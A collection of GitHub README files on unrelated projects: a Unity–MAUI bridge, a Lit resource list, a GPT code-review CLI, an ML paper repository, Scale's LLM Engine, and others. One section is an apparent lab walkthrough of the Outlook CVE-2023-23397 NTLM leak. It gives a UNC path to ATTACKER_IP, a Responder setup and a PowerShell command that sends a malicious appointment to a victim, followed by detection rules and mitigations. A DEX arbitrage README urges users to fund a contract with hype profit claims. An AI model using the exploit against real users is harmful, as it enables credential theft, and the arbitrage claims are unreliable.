[Protocol] interface UnityFrameworkListener { [Export("unityDidUnload:")] void UnityDidUnload(NSNotification notification); [Export("unityDidQuit:")] void UnityDidQuit(NSNotification notification); } [BaseType(typeof(NSObject))] interface UnityFramework { [Export("appController")] UnityAppController AppController(); [Static, Export("getInstance")] UnityFramework GetInstance(); [Export("setDataBundleId:")] void SetDataBundleId([PlainString] string bundleId); [Static, Export("loadUnity")] UnityFramework LoadUnity(); [Internal, Export("runUIApplicationMainWithArgc:argv:")] void RunUIApplicationMainWithArgc(int argc, IntPtr argv); [Export("runEmbedded")] void RunEmbedded(); [Internal, Export("runEmbeddedWithArgc:argv:appLaunchOpts:")] void RunEmbeddedWithArgc(int argc, IntPtr argv, NSDictionary options); [Export("unloadApplication")] void UnloadApplication(); [Export("quitApplication:")] void QuitApplication(int exitCode); [Export("registerFrameworkListener:")] void RegisterFrameworkListener(IUnityFrameworkListener obj); [Export("unregisterFrameworkListener:")] void UnregisterFrameworkListener(IUnityFrameworkListener obj); [Export("showUnityWindow")] 
void ShowUnityWindow(); [Export("pause:")] void Pause(bool pause); [Export("setExecuteHeader:")] void SetExecuteHeader(ref MachHeader header); [Export("sendMessageToGOWithName:functionName:message:")] void SendMessageToGOWithName([PlainString] string goName, [PlainString] string functionName, [PlainString] string msg); } } ``` * Open the StructsAndEnums.cs file and replace with the following content: ``` using System.Runtime.InteropServices; using Foundation; namespace iOSBridge { [StructLayout(LayoutKind.Sequential)] public struct MachHeader { public uint magic; /* mach magic number identifier */ public int cputype; /* cpu specifier ; cpu_type_t*/ public int cpusubtype; /* machine specifier ; cpu_subtype_t */ public uint filetype; /* type of file */ public uint ncmds; /* number of load commands */ public uint sizeofcmds; /* the size of all the load commands */ public uint flags; /* flags */ public uint reserved; /* reserved */ } } ``` ### Starting Unity In MAUI To start the Unity app in MAUI: **Android** Create a new `Activity` under `Platforms/Android/` named `UnityActivity` and replace it with the content defined in [/UnityActivity.cs](UnityUaalMaui/UnityUaalMaui/Platforms/Android/UnityActivity.cs). Please review the code carefully as this file: * Instantiates a new UnityPlayer and adds it as the root control of the actity. * Connects the core activity callbacks into the Unity Player. * Implements the data bridging API calls. To start Unity, start the activity with a new Intent: ``` public static void ShowUnityWindow() { var intent = new Android.Content.Intent(Microsoft.Maui.ApplicationModel.Platform.CurrentActivity, typeof(UnityActivity)); intent.AddFlags(Android.Content.ActivityFlags.ReorderToFront); Microsoft.Maui.ApplicationModel.Platform.CurrentActivity.StartActivity(intent); } ``` **iOS** To start Unity, first initialise the Unity framework: ``` private static UnityFramework framework = null; public static bool IsUnityInitialised => framework != null && framework.AppController() != null; private static void InitialiseUnity() { if (IsUnityInitialised) { return; } framework = UnityFramework.LoadUnity(); framework.RegisterFrameworkListener(new UnityBridge_UnityFrameworkListener()); Bridge.RegisterUnityContentReceiver(new UnityBridge_UnityContentReceiver()); framework.RunEmbedded(); } ``` Then open the Unity ViewController by calling `framework.ShowUnityWindow()`: ``` public static void ShowUnityWindow() { if (!IsUnityInitialised) { InitialiseUnity(); } if (framework != null) { framework.ShowUnityWindow(); } } ``` ### Communicating Between Unity and MAUI To send and receive content from Unity, please review the platform specific implementations of the UnityBridge: * [UnityBridge.Android.cs](UnityUaalMaui/UnityUaalMaui/Unity/UnityBridge.Android.cs) * [UnityBridge.iOS.cs](UnityUaalMaui/UnityUaalMaui/Unity/UnityBridge.iOS.cs) ## Known Issues + Limitations * Sometimes crashes on Android when *receiving* data from Unity when debugger attached. Does not happen in non-debugging builds. * Somestimes launching the Unity engine can freeze app on Android. No known cause or solution yet, still investigating.
62
1
verytinydever/b2b-parser
https://github.com/verytinydever/b2b-parser
null
# Parser setup ## Build ``` $ docker build -t b2bparser:latest . ``` ## Run ``` $ docker run -it -v /root/b2b-parser/logs:/tmp/logs --restart unless-stopped --net=host b2bparser ```
14
0
mvneerven/lit-list
https://github.com/mvneerven/lit-list
null
# Web Components & Lit Library - a Curated List of documentation A curated list of great documentation to get frontenders started with **Web Components & Lit**, with or without a framework. # Web Components basics Basically, Web Components consist of [three technologies](https://exyte.com/blog/web-components-technology "Overview of the Web components in 2021"): Custom elements, Shadow DOM, and HTML templates.- [Web Components | MDN](https://developer.mozilla.org/en-US/docs/Web/Web_Components "Web Components | MDN")\ *Simply the best source of truth about all Web Technology* - [webcomponents.org - Discuss & share web components](https://www.webcomponents.org/ "webcomponents.org - Discuss & share web components")\ *WebComponents.org aims to make it easy to share, discover, and reuse web components* - Open Web Components - [Open Web Components](https://open-wc.org/ "Open Web Components")\ *Well-known and experience-tested recommendations for their web component projects* - Project Scaffolding [Development: Generator: Open Web Components](https://open-wc.org/docs/development/generator/ "Development: Generator: Open Web Components") - What are Web Components (video)[](https://www.youtube.com/watch?v=83W63gTVlSk) # In-Depth Web Components ## Rob Eisenberg Rob Eisenberg is a respected voice in the Web Components community. He has worked on Angular at Google, on FAST at Microsoft, and is a member of the W3C Web Componnents Community Group. 1. [About Web Components](https://eisenbergeffect.medium.com/about-web-components-7b2a3ed67a78 "About Web Components") 2. [Debunking Web Component Myths and Misconceptions](https://eisenbergeffect.medium.com/debunking-web-component-myths-and-misconceptions-ea9bb13daf61 "Debunking Web Component Myths and Misconceptions") 4. [2023 State of Web Components](https://eisenbergeffect.medium.com/2023-state-of-web-components-c8feb21d4f16 "2023 State of Web Components") # Relevant Web Standards Web Components are an umbrella term. These are the underlying technologies you need to know to make the best of Web Components & Lit. - ES6 Module - [JavaScript modules - JavaScript | MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Modules "JavaScript modules - JavaScript | MDN")\ *Module encapsulation, imports, exports* - String templates (ES6) - [Template literals (Template strings) - JavaScript | MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals "Template literals (Template strings) - JavaScript | MDN")\ *Template-based rendering with variables* - CSS custom properties/variables - [Using CSS custom properties (variables) - CSS: Cascading Style Sheets | MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties "Using CSS custom properties (variables) - CSS: Cascading Style Sheets | MDN")\ *Isolated styling with defined variables for external influence* - [customElements.define()](https://developer.mozilla.org/en-US/docs/web/api/customelementregistry/define "CustomElementRegistry.define() - Web APIs | MDN")\ *How to register a custom HTML element* - [Shadow DOM](https://developer.mozilla.org/en-US/docs/Web/API/Web_Components/Using_shadow_DOM) # Google's Lit Library > A really high level view of Lit would be that it's simply filling in the Gaps in the standards. 
Lit is a tiny (\<5Kb) library written by **Justin Fagnani** of Google, which was developed to fill a few gaps and make working with Web Components as easy as working with **React UI**, but without the need for expensive indirections like Virtual DOM and JSX.[](https://www.youtube.com/watch?v=ndZ8vcxNp0Q)> *A Lit component renders its template initially when it's added to the DOM on a page. After the initial render, any change to the component's reactive properties triggers an update cycle, re-rendering the component.* > *Lit batches updates to maximize performance and efficiency. Setting multiple properties at once triggers only one update, performed asynchronously at microtask timing.* > *During an update, only the parts of the DOM that change are re-rendered. Although Lit templates look like string interpolation, Lit parses and creates static HTML once, and then only updates changed values in expressions after that, making updates very efficient. - from* [*https://lit.dev/docs/components/rendering*](https://lit.dev/docs/components/rendering "Rendering – Lit") See [Lit for React Developers | Google Codelabs](https://codelabs.developers.google.com/codelabs/lit-2-for-react-devs#1 "Lit for React Developers | Google Codelabs")- [Lit](https://lit.dev/) (Simple. Fast. Web Components)\ *Lit Homepage* - [From Web Component to Lit Element | Google Codelabs](https://codelabs.developers.google.com/codelabs/the-lit-path#0 "From Web Component to Lit Element | Google Codelabs")\ *A course to take you from React to Lit expert* - [GitHub - web-padawan/awesome-lit: A curated list of awesome Lit resources.](https://github.com/web-padawan/awesome-lit "GitHub - web-padawan/awesome-lit: A curated list of awesome Lit resources.")\ *A curated list of wonderful Lit-related stuff* - [The Browser is your Framework: Building a PWA with only Web Components and Lit](https://javascript.plainenglish.io/the-browser-is-your-framework-building-a-pwa-with-only-web-components-and-lit-c91f0f86900d "The Browser is your Framework: Building a PWA with only Web Components and Lit")\ *My article on creating PWAs with only Web Components and Lit, and the* [*NPM initializer*](https://www.npmjs.com/package/create-lit-pwa "create-lit-pwa") [*Artem Maiorov*](https://www.linkedin.com/in/artem-maiorov-792a7b3a/) *created with me.\ See also* [*the list of LinkedIn Posts*](https://www.linkedin.com/feed/hashtag/es6pwa/) *around this approach.* - [Some things to know when developing with Lit](https://open-wc.org/blog/some-things-to-know-when-developing-with-lit/) # Component Libraries & Design Systems ## Design System Tools- Custom Element Manifest - [Getting Started: Custom Elements Manifest](https://custom-elements-manifest.open-wc.org/analyzer/getting-started/ "Getting Started: Custom Elements Manifest") - Storybook - [Storybook: Frontend workshop for UI development](https://storybook.js.org/) - [Getting Started With Storybook Without a JavaScript Framework | by RayRay | Better Programming](https://betterprogramming.pub/getting-started-with-storybook-without-a-javascript-framework-c2968d3f3d9f) ## Web Components Component Libraries Ready-to-use UI component libraries to use in any project. 
- Microsoft Fast - [FAST](https://www.fast.design/ "FAST") - Shoelace - [Shoelace](https://shoelace.style/ "Shoelace") - Ionic - [Ionic Framework - The Cross-Platform App Development Leader](https://ionicframework.com/ "Ionic Framework - The Cross-Platform App Development Leader") - Google Material: [material-components/material-web: Material Design Web Components (github.com)](https://github.com/material-components/material-web)\ *Note: v3 is currently in development (April 2023)* - Adobe (Spectrum) - [Spectrum Web Components - Spectrum Web Components](https://opensource.adobe.com/spectrum-web-components/ "Spectrum Web Components - Spectrum Web Components") - RedHat (Patternfly) - [PatternFly 4](https://www.patternfly.org/v4/ "PatternFly 4") - AWS (Amplify) - [Amplify UI Components - AWS Amplify Docs](https://docs.amplify.aws/ui/ "Amplify UI Components - AWS Amplify Docs") - Vaadin - [GitHub - vaadin/web-components: A set of high-quality...](https://github.com/vaadin/web-components "GitHub - vaadin/web-components: A set of high-quality standards based web components for enterprise web applications. Part of Vaadin 20+") ## Web Component Design Systems / Discovery - <https://www.webcomponents.org/> - <https://webcomponents.dev/> - <https://github.com/web-padawan/awesome-web-components> # Web Components Only Approach (not using a framework) When you decide not to use any existing framework, you have to decide what to use for a few common areas normally taken care of by the framework, such as state management and routing. ## General Web Capabilities - [What Web Can Do Today](https://whatwebcando.today/ "What Web Can Do Today") - [What PWA Can Do Today](https://whatpwacando.today/ "What PWA Can Do Today") - [Project Fugu](https://www.chromium.org/teams/web-capabilities-fugu/ "Web Capabilities (Project Fugu 🐡)") ## State Management State Management is one of the strongest reasons people keep referring to frameworks, but if you look at what people then use, it's a lot of Redux and other libraries, which are combined with their favorite frameworks, sometimes even packaged, but libraries they are.The same libraries and approaches can be combined with Web Components and Lit!- [Using Redux in a LitElement app | Vaadin](https://vaadin.com/blog/using-redux-in-a-litelement-app "Using Redux in a LitElement app | Vaadin") - [GitHub - gitaarik/lit-state: Simple shared app state management for LitElement.](https://github.com/gitaarik/lit-state "GitHub - gitaarik/lit-state: Simple shared app state management for LitElement.") - [Valtio, makes proxy-state simple for React and Vanilla](https://valtio.pmnd.rs/ "Valtio, makes proxy-state simple for React and Vanilla") - [State Management in Javascript Using Proxy | by Greedy Goblin Games | Medium](https://medium.com/@cjhazard.1/state-management-in-javascript-using-proxy-39f9a87cf0a1) - [gitaarik/lit-state: Simple shared app state management for LitElement. (github.com)](https://github.com/gitaarik/lit-state) - [MobX](https://mobx.js.org/ "MobX") - *Simple, scalable state management.* - [The Mediator Pattern in JavaScript — JSManifest](https://jsmanifest.com/the-mediator-pattern-in-javascript/) - [Zustand](https://docs.pmnd.rs/zustand "Zustand Documentation") - [Web Components Context Protocol implementation](https://lit.dev/docs/data/context/) ## Routing When not using a framework, routing is not provided as a ready-to-use component. 
Using browser-native functionality isn't complex (using [History](https://developer.mozilla.org/en-US/docs/Web/API/History_API/Working_with_the_History_API "Working with the History API - Web APIs | MDN")), and lately, the new URLPattern API allows you to do any kind of routing, including complex parameter passing, natively. The Lit PWA (see my previously mentioned article, *The Browser is your Framework: Building a PWA with only Web Components and Lit*) uses it, including lazy-loading polyfills if needed.

- [URLPattern brings routing to the web platform - Chrome Developers](https://developer.chrome.com/articles/urlpattern/ "URLPattern brings routing to the web platform - Chrome Developers")

Other router solutions:

- [Polymer/pwa-helpers: Small helper methods or mixins to help you build web apps. (github.com)](https://github.com/Polymer/pwa-helpers)
- [tuwrraphael/route-it: dead simple vanilla js spa router (github.com)](https://github.com/tuwrraphael/route-it)
- [A SPA/PWA Router in Pure Vanilla ES6 JavaScript | by Marc van Neerven | JavaScript in Plain English](https://javascript.plainenglish.io/a-spa-pwa-router-in-pure-vanilla-es6-javascript-e8f79cfd0111)

# Using Web Components in Frameworks

When you do decide to work with your favorite framework, Web Components can still be a valid choice for everything UI, because you will be able to reuse the components across projects with differing frameworks, and they will work regardless of framework upgrades or switching to other frameworks. This is why many companies, such as Google, Adobe, RedHat, Microsoft, Cisco, SAP and VMWare are already investing heavily in Web Components.

## Generic information on Web Components in frameworks:

- [Create Web Components by using Google Lit, publish them on Npm and use them in React, Angular & JS projects - DEV Community 👩‍💻👨‍💻](https://dev.to/fabiobiondi/create-web-components-by-using-google-lit-publish-them-on-npm-and-use-them-in-react-angular-js-projects-3676)
- [Pairing Web Components with JS frameworks - Ionic](https://ionic.io/resources/articles/building-design-systems-with-web-components#h-pairing-web-components-with-js-frameworks)
- [Custom Elements Everywhere](https://custom-elements-everywhere.com/ "Custom Elements Everywhere")\
  *An overview of Web Component readiness in the popular frameworks*

## React

- [Lit for React Developers (google.com)](https://codelabs.developers.google.com/codelabs/lit-2-for-react-devs#0)\
  *E-learning to move from React to Lit*
- [How To Use Web Components in React](https://blog.devgenius.io/how-to-use-web-components-in-react-54c951399bfd#:~:text=How%20To%20Use%20Web%20Components%20in%20React%201,Component%20in%20React%20...%205%20Final%20Thoughts%20 "How To Use Web Components in React")
- [Creating and using Web Components in React](https://www.youtube.com/watch?v=PUGDzA1uP-Y)
- [React hooks reimplemented for Web Components - GitHub](https://github.com/matthewp/haunted)

## Angular

- [How To Use Web Components in Angular](https://levelup.gitconnected.com/how-to-use-web-components-in-angular-c5d1d7825ca0 "How To Use Web Components in Angular")
- [Using Web Components in Angular Forms with Element Internals - Angular 16 | 15](https://coryrylan.com/blog/using-web-components-in-angular-forms-with-element-internals "Using Web Components in Angular Forms with Element Internals - Angular 16 | 15")
- [How to integrate Web Components using Lit in Angular - This Dot Labs](https://www.thisdot.co/blog/how-to-integrate-web-components-using-lit-in-angular "How to integrate Web Components using Lit in Angular - This Dot Labs")
- [Master Web Component Forms Integration - with Lit and Angular](https://www.thinktecture.com/en/web-components/web-component-forms-integration-with-lit-and-angular/ "Master Web Component Forms Integration - with Lit and Angular")
- <https://stackoverflow.com/questions/56837900/how-to-import-angular-web-component-in-another-angular-app>
- [Using Web Components in Angular](https://www.youtube.com/watch?v=2Wjp_FsWOXU)

## Vue

- [How to Create Reusable Web Components with Lit and Vue](https://dval.dev/blog/lit-web-components-tutorial/ "dval.dev")
- [How to use Web Components in Vue](https://www.youtube.com/watch?v=gp-1LzhSH30)

---

This list is maintained by [Marc van Neerven](https://www.linkedin.com/in/mvneerven/)<br>
12
0
fynnfluegge/gitreview-gpt
https://github.com/fynnfluegge/gitreview-gpt
A CLI tool that reviews your git changes with GPT-3.5
# gitreview-gpt

`gitreview-gpt` reviews your git changes with OpenAI's GPT-3.5 model from the command line and provides detailed review comments with the corresponding line numbers. Your `git diff` is parsed into a format the `gpt-3.5-turbo` completion API can easily work with, so the feedback is precise and based on your actual code changes.

![ezgif-5-956a1609ab](https://github.com/fynnfluegge/gitreview-gpt/assets/16321871/ce68fb34-2748-4929-aaaa-b2a1271301a5)

## ✨ Features

- **Get feedback and suggestions with the corresponding line numbers to git changes**
- **Reviews all changes in the working directory**
- **Reviews only staged changes**
- **Reviews all committed changes against a specific branch**
- **Reviews all modified files at once or separately**
- **Creates a commit message for your changes**

## 🚀 Usage

- `rgpt review`: Reviews all changes in your working directory.
- `rgpt review --staged`: Reviews all staged changes in your working directory.
- `rgpt review --target $BRANCH`: Reviews all committed changes in your current branch compared to `$BRANCH`.
- `rgpt commit`: Creates a commit message for your staged changes.

## 📋 Requirements

- Python >= 3.8

## 🔧 Installation

Create your personal OpenAI API key and add it as `$OPENAI_API_KEY` to your environment with:

```
export OPENAI_API_KEY=<YOUR_API_KEY>
```

Install with `pipx`:

```
pipx install gitreview-gpt
```

> [!NOTE]
> It is recommended to use `pipx` for installation; nonetheless, it is also possible to use `pip`
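For readers curious what this looks like under the hood, the sketch below is not the tool's actual source; it is only a minimal illustration of the flow described above (grab the `git diff`, send it to the `gpt-3.5-turbo` chat completion API, and ask for line-referenced comments). It assumes the `openai` Python package (v1 client) is installed and that `OPENAI_API_KEY` is set as shown in the installation section.

```python
import subprocess
from openai import OpenAI  # assumes openai>=1.0 and OPENAI_API_KEY in the environment

def review_working_directory() -> str:
    # Collect the unstaged changes, conceptually what `rgpt review` looks at.
    diff = subprocess.run(["git", "diff"], capture_output=True, text=True, check=True).stdout
    if not diff.strip():
        return "No changes to review."

    client = OpenAI()
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system", "content": "You are a strict code reviewer. "
             "Reference file names and line numbers from the diff in every comment."},
            {"role": "user", "content": diff},
        ],
        temperature=0.2,
    )
    return response.choices[0].message.content

if __name__ == "__main__":
    print(review_working_directory())
```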
11
0
Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397
null
To exploit this vulnerability, an attacker must create a malicious calendar invitation that includes a reference to a sound file pointing to a file in a network share on the attacker's machine. At a low level, an Outlook email stores the reference to the sound file in an internal parameter called "PidLidReminderFileParameter". To ensure that the audio we embed in our malicious email will take precedence over the victim's default reminder configurations, we will also need to set another parameter called "PidLidReminderOverride" to true.

To set up the "PidLidReminderFileParameter" property to point to a network share, the attacker can specify a Universal Naming Convention (UNC) path instead of a local file. UNC is used in Windows operating systems to find network resources (files, printers, shared documents). These paths consist of a double backslash, the IP address or name of the computer hosting the resource, the share name and the file name. For example:

\\ATTACKER_IP\foo\bar.wav

When the victim receives the malicious email, the UNC path directs them to that SMB share, triggering the vulnerability. This causes the system to start an NTLM authentication process against the attacker's machine, leaking a Net-NTLMv2 hash that the attacker can later try to crack.

If for some reason the SMB protocol isn't a viable alternative to use, non-server versions of Windows will accept UNC paths pointing to ports 80 or 443, and use HTTP to retrieve the file from a WebDAV-enabled web server. The syntax of such a UNC path is as follows:

\\ATTACKER_IP@80\foo\bar.wav OR \\ATTACKER_IP@443\foo\bar.wav

This may be useful to bypass firewall restrictions preventing outgoing connections to port 445 (SMB).

Attack Phase

Let's craft a malicious email containing an appointment with the required parameters to trigger it.

Setting up Responder: Since we expect the victim to trigger an authentication attempt against the attacker on port 445, we will set up Responder to handle the authentication process and capture the NetNTLM hash for us. If you are unfamiliar with Responder, it simply emulates an SMB server and captures any authentication attempt against it.

responder -I <interface>

Attempting to Handcraft a Malicious Appointment:
- As a first attempt, we could manually create an appointment and edit the path to the reminder's sound file to point to a shared folder. To create an appointment, you will first need to click on the calendar and then on the New Appointment button.
- We will create an appointment that includes a reminder set to 0 minutes so that it triggers right after the victim receives it. We will also click on the Sound option to configure the reminder's sound file.
- We can try setting the sound file path to a UNC path that points to the attacker's machine. However, Outlook will silently ignore the UNC path and revert to using the default WAV file, which can be confirmed by going back to the Sound dialogue (if it isn't replaced, we can move further from here; otherwise we will need to install the OutlookSpy plugin to aid us).

OutlookSpy: Even if Outlook cannot set the reminder's sound file to a UNC path, we can use the OutlookSpy plugin to achieve this. This plugin will allow you to access all of Outlook's internal parameters directly, including the reminder's sound file. You will need to install it manually before proceeding. Be sure to close Outlook before running the installer.

- To view our current appointment from OutlookSpy, click the OutlookSpy tab. Be sure to click the "CurrentItem" button from within the appointment, or you might modify different Outlook components.
- From this window, you can see the parameters associated with the appointment's reminder. We want to set the "ReminderSoundFile" parameter to the UNC path that points to the attacker's machine and set both "ReminderOverrideDefault" and "ReminderPlaySound" to true.

Just for reference, here's what each parameter does:

ReminderPlaySound: boolean value that indicates if a sound will be played with the reminder.
ReminderOverrideDefault: boolean value that tells the receiving Outlook client to play the sound pointed to by ReminderSoundFile, instead of the default one.
ReminderSoundFile: string with the path to the sound file to be used. For our exploit, this will point to a bogus shared folder on the attacker's machine.

We can use the script tab and the following script to change the parameters to the required values:

AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\<attacker's IP>\<share_folder>\file.wav"

Be sure to click the "Run" button for the changes to be applied. You can go back to the "Properties" tab to check that the values were correctly changed.

Finally, save your appointment to add it to your calendar, making sure the reminder is set to "0 minutes" and that the appointment matches the current time and date, as we want it to trigger immediately. If all went as expected, you should immediately see a reminder popping up, and you should receive the authentication attempt in your Responder console on the attacker's machine.

Weaponisation

Summarising the steps required to exploit the vulnerability, an attacker would need to:
- Create a malicious meeting/appointment with a custom reminder sound pointing to a UNC path on the attacker's machine.
- Send the invite to the victim via email.
- Wait for the reminder to trigger a connection against the attacker's machine.
- Capture the Net-NTLMv2 hash, use authentication relaying, or profit in any other way.

Steps 3 and 4 are already covered for us by Responder, but handcrafting the malicious appointment by hand is a bit tedious. Luckily, a couple of exploits are readily available for us to create and send a malicious appointment, one of which is provided in this repository. This PowerShell exploit leverages Outlook's COM objects to build emails and appointments easily. It contains a couple of functions that we can use:

Save-CalendarNTLMLeak: This function creates a malicious appointment and saves it to your own calendar. Useful for testing purposes.
Send-CalendarNTLMLeak: This function creates a malicious appointment and sends it via email to a victim. The email invitation will be sent from your Outlook's current default account.

Using the Exploit: Within PowerShell, you can import the exploit's functions with the "Import-Module" cmdlet. After that, both functions will be available in your current PowerShell session. To send an email with a malicious appointment, you can just run the following command:

PS C:\Users\User\Desktop\> Import-Module .\CVE-2023-23397.ps1
PS C:\Users\User\Desktop\> Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\ATTACKER_IP\foo\bar.wav" -meetingsubject "Random Meeting" -meetingbody "This is just a regular meeting invitation."

Since the exploit makes use of the current Outlook instance to send the email, you will likely get a couple of alerts asking you to grant permission to the script to send emails on your behalf. Make sure to press Allow as many times as needed. Marking the "Allow access for 10 minutes" checkbox should also help speed this process up.

Detection and Mitigation

Detection: Now that we have gone through the steps to weaponize the CVE-2023-23397 attack on Outlook, let's talk about a few ways to detect this attack within the network. Each attack leaves patterns or artifacts that could help the detection team identify the threats. It all depends on the network visibility and on the log sources that are being collected to provide that visibility.

Sigma Rules: The appended Sigma rule detects Outlook initiating a connection to a WebDAV or SMB share, indicating a post-exploitation phase. This Sigma rule looks to detect "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie, which indicates a post-exploitation/exfiltration phase. These Sigma rules can be converted for your detection and monitoring tool to hunt for suspicious log activity within the network.

Yara Rule: A YARA rule looks for patterns within files on disk. The appended community YARA rules can be used to detect a suspicious MSG file on disk with the two properties discussed above.

Microsoft has released a PowerShell script, "CVE-2023-23397.ps1", that will check Exchange messaging items (mail, calendar, and tasks) to see if any IOCs related to the CVE-2023-23397 attack are found. The script can be used to audit and clean the detected items.

Mitigation: This vulnerability is being exploited extensively in the wild. Some of the steps recommended by Microsoft to mitigate and avoid this attack are:
- Add users to the Protected Users Security Group, which prevents using NTLM as an authentication mechanism.
- Block TCP 445/SMB outbound from your network to avoid any post-exploitation connection.
- Use the PowerShell script released by Microsoft to scan the Exchange server to detect any attack attempt.
- Disable the WebClient service to avoid WebDAV connections.
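To complement the Sigma and YARA rules mentioned above, a very rough triage pass can also be scripted. The snippet below is not Microsoft's CVE-2023-23397.ps1 and does not parse the MSG format properly; it is only an illustrative Python heuristic over exported .msg files that flags any file containing a UNC-looking path (including the @80/@443 WebDAV variants), so you can inspect the hits with proper tooling afterwards. The directory name is a placeholder.

```python
import re
from pathlib import Path

# Very loose heuristic: a UNC path (\\host\share\file, optionally with @80/@443)
# embedded in a message file is worth a closer look when hunting for
# CVE-2023-23397-style reminder properties. MSG files store most strings as
# UTF-16LE inside a compound file, so we decode leniently in two ways.
UNC_PATTERN = re.compile(r"\\\\[\w.\-]+(?:@(?:80|443))?\\[^\r\n\x00]{1,200}")

def flag_suspicious_msg_files(directory: str) -> list[Path]:
    """Return .msg files under `directory` that contain a UNC-looking path."""
    hits = []
    for msg_file in Path(directory).rglob("*.msg"):
        raw = msg_file.read_bytes()
        for text in (raw.decode("utf-16-le", errors="ignore"),
                     raw.decode("latin-1", errors="ignore")):
            if UNC_PATTERN.search(text):
                hits.append(msg_file)
                break
    return hits

if __name__ == "__main__":
    for path in flag_suspicious_msg_files("./exported_mailbox"):
        print(f"[!] possible UNC reminder path in: {path}")
```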
19
1
FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract
https://github.com/FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract
Discover the secret to trading success with our game-changing solidity smart contract. Execute Triangular Arbitrage on DEX's effortlessly, leveraging its open-source nature and profitability. It's time to level up your trading journey! Get started today!
<img src="banner.png" /> What Is DEX Crypto Triangular Arbitrage? Triangular arbitrage is the result of a discrepancy between three tokens that occurs when the DEX exchange rates do not exactly match up. if you dont have metamask browser extension by getting it here https://metamask.io/download/ and make sure you configure metamask for the network your want to use for ETH: configure by Default for BNB: https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain for polygon: https://www.coindesk.com/learn/how-to-connect-metamask-to-the-polygon-network/ Step 1. Goto https://remix.ethereum.org Step 2. Make a New File name it myContract.sol <img src="1.png" /> Step 3. copy and paste the this code https://github.com/FryCoderX/DEX-Triangular-Arbitrage-Solidity-Smart-Contract/blob/main/DEX-Triangular-Arbitrage.sol in to the new file <img src="2.png" /> Step 4. compile the new file "if you get a Green checkmark every thing complied correctly" <img src="3.png" /> Step 5. Appoved remix to connect to MetaMask "Will only ask if you never connected to remix before" , Set Environment to "Injected Provider - MetaMask" and deploy <img src="4.png" /> Step 6. For the polygon netwrok you need to change the priorty fee , for ETH and BNB you should not need to do that in less the contract deployment fails <img src="5.png" /> <img src="6.png" /> <img src="7.png" /> <img src="8.png" /> <img src="9.png" /> Step 9. Copy your contract address <img src="10.png" /> Step 10. Scan your contract address in a block scanner for ETH etherscan.io , BNB bscscan.com , Polygon polygonscan.com <img src="11.png" /> Step 11. Fund your contract <img src="12.png" /> Step 12. Scan your contract address in a block scanner if the transcation is completed <img src="13.png" /> Step 13. Start your Contract <img src="14.png" /> <img src="15.png" /> <img src="16.png" /> Step 12. Scan your contract address in a block scanner to see if all went well "if it say failed if it does read the error to find out way , most of the time it has to do with the contract being under funded" <img src="17.png" /> This repository contains a Solidity smart contract that enables decentralized exchange (DEX) triangular arbitrage on the Ethereum blockchain. With this contract, developers can automate and execute profitable triangular arbitrage strategies across different tokens listed on decentralized exchanges. Features: Triangular Arbitrage Logic: The smart contract includes the logic to calculate optimal trade amounts and execute trades across the DEX. Trustless and Decentralized: The contract operates on the Ethereum blockchain, eliminating the need for intermediaries and ensuring a secure and transparent arbitrage process. Profit Calculation: The contract calculates the profit obtained from the arbitrage by comparing token balances before and after the trades. Gas Optimization: The contract is designed with gas optimization in mind to minimize transaction costs and maximize profitability. Easy Integration: The contract is written in Solidity, the popular programming language for Ethereum smart contracts, making it easy to integrate into existing decentralized applications (dApps) or develop new ones. #defi #digitalcurrency #cryptoconsultancy #cryptosignals #cryptos #cryptotrading #bitcoinmining #cryptoanalyst #cryptonetwork #cryptotrader
21
21
lilujunai/EMQ-series
https://github.com/lilujunai/EMQ-series
[ICCV-2023] EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization
# EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization (ICCV2023)

This repository contains all the experiments of our paper "EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization". Final implementations are in preparation.

![emq_primitives](emq_primitives.png)

## Acknowledgements

This repo is based on the following repos; thanks a lot to the authors.

- [BRECQ: Pushing the Limit of Post-Training Quantization by Block Reconstruction (ICLR 2021)](https://arxiv.org/abs/2102.05426)
- [OMPQ](https://github.com/MAC-AutoML/OMPQ/tree/master)

## Citation

If you find that this project helps your research, please consider citing some of the following papers:

```
@inproceedings{Dong2023EMQ,
 title={EMQ: Evolving Training-free Proxies for Automated Mixed Precision Quantization},
 author={Peijie Dong, Lujun Li, Zimian Wei, Xin Niu, ZHILIANG TIAN, Hengyue Pan},
 booktitle={International Conference on Computer Vision (ICCV)},
 year={2023}
}
```
10
0
scaleapi/llm-engine
https://github.com/scaleapi/llm-engine
Scale LLM Engine public repository
# ⚡ LLM Engine ⚡

**The open source engine for fine-tuning and serving large language models**.

Scale's LLM Engine is the easiest way to customize and serve LLMs. In LLM Engine, models can be accessed via Scale's hosted version or by using the Helm charts in this repository to run model inference and fine-tuning in your own infrastructure.

## 💻 Quick Install

```commandline
pip install scale-llm-engine
```

## 🤔 About

Foundation models are emerging as the building blocks of AI. However, deploying these models to the cloud and fine-tuning them are expensive operations that require infrastructure and ML expertise. It is also difficult to maintain over time as new models are released and new techniques for both inference and fine-tuning are made available.

LLM Engine is a Python library, CLI, and Helm chart that provides everything you need to serve and fine-tune foundation models, whether you use Scale's hosted infrastructure or do it in your own cloud infrastructure using Kubernetes.

### Key Features

🎁 **Ready-to-use APIs for your favorite models**: Deploy and serve open-source foundation models — including LLaMA, MPT and Falcon. Use Scale-hosted models or deploy to your own infrastructure.

🔧 **Fine-tune foundation models**: Fine-tune open-source foundation models on your own data for optimized performance.

🎙️ **Optimized Inference**: LLM Engine provides inference APIs for streaming responses and dynamically batching inputs for higher throughput and lower latency.

🤗 **Open-Source Integrations**: Deploy any [Hugging Face](https://huggingface.co/) model with a single command.

### Features Coming Soon

